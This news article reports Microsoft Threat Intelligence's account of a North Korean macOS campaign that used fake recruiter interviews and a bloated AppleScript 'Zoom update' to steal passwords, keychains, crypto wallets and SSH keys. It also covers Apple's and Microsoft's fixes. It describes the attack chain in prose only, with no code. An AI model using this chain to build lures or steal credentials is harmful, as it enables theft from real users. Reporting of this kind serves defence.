Cybersecurity is a shared responsibility since a single weak link in the chain can cripple entire infrastructures. Many software vendors and security professionals collaborate to discover security gaps, privately report them to maintainers, and get them resolved before they are exploited. One such collective is Microsoft Threat Intelligence, which has collaborated with Apple to patch a major security hole that allowed the theft of credentials and other sensitive data like crypto wallets.
In details shared with Neowin, Microsoft has described a sophisticated campaign that was being carried out by North Korean state actor Sapphire Sleet to hack macOS customers. Interestingly, this attack involves social engineering more than exploiting software flaws.
Essentially, the threat actor had set up recruiter profiles which would engage with targets regarding job opportunities and then send them invites for technical interviews. When the candidates join the meeting, they are asked to install a Zoom SDK Update.scpt file provided during the meeting. This AppleScript file opens in the macOS Script Editor by default and while it appears completely harmless and official on first glance, if you scroll thousands of lines, you'll come across the harmful code embedded inside it. The unsuspecting target is asked to execute the script, which triggers the malware attack.
Upon execution, the script downloads additional malware payloads using trusted mechanisms, while also keeping track of the campaign progress using distinct user-agent strings. The malware then begins its reconnaissance activity through which it collects details about your account and PC. It then launches a malicious System Update app, which asks the user to enter their password so they can configure their settings. This dialog box uses native macOS elements, so it is "visually indistinguishable" from a legitimate prompt, according to Microsoft. Once the password is validated against your system's database, it is immediately exfiltrated to Sapphire Sleet using the Telegram Bot API.
Then, this attack toolchain triggers a Software Update application, which gives the illusion of the Zoom update process that completes successfully. This reduces any doubt that you may have about the legitimacy of the software. Finally, it installs multiple backdoors to ensure persistence on the target's machine.
Here are the details of the additional information that Sapphire Sleet exfiltrates from your system:
- Host and system reconnaissance
- Installed applications and runtime verification
- Messaging session data (Telegram)
- Browser data and extension storage
- macOS keychain
- Cryptocurrency desktop wallets
- SSH keys and shell history
- Apple Notes
- System logs and failed access attempts
Following discovery, Microsoft informed Apple about the malware campaign, after which the latter strengthened its security infrastructure on macOS and Safari, in particular. Meanwhile, Microsoft also updated Defender so that it can protect users against Sapphire Sleet too. It has also shared some guidance and XDR hunting queries that security personnel can leverage to detect and mitigate attacks.
The exact scope of the attack is unknown, but it appears to be highly aimed at potential high-value targets. This is because of the nature of the campaign itself. It is spread through fake recruiter profiles and harvests data from cryptocurrency wallets too. In addition, it is necessary that the user have macOS hardware, not something else, when they join the interview. You can find more details about this espionage activity on the Microsoft Threat Intelligence blog here.
1 Comment
Load the comments and join the conversation!
Read the comments, ask the editors questions, show respect and join the conversation.